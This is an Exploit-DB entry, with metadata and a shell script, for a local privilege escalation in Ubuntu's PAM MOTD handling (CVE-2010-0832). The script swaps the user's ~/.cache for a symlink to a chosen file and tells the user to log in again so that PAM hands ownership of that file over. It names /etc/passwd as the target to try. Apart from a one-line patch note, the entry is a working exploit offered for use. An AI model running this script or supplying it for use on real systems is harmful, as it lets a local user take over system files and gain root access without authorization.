Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)

Author: Kristian Erik Hermansen
type: local
platform: linux
port: nan
date_added: 2010-07-08 
date_updated: 2010-07-10 
verified: 1 
codes: CVE-2010-0832;OSVDB-66116 
tags: 
aliases:  
screenshot_url:  
application_url: 

#!/bin/sh
#
# EDB Note: Updated exploit ~ https://www.exploit-db.com/exploits/14339/
#
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
# Date: July 7, 2010
# Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)
# CVE : CVE-2010-0832
#
# Notes: Affects Ubuntu 9.10 and 10.04 LTS
# [Patch Instructions]
# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i
#

if [ $# -eq 0 ]; then
    echo "Usage: $0 /path/to/file"
    exit 1
fi

mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -sf $1 $HOME/.cache
echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :)  File will then be owned by your user.  Try /etc/passwd...\n"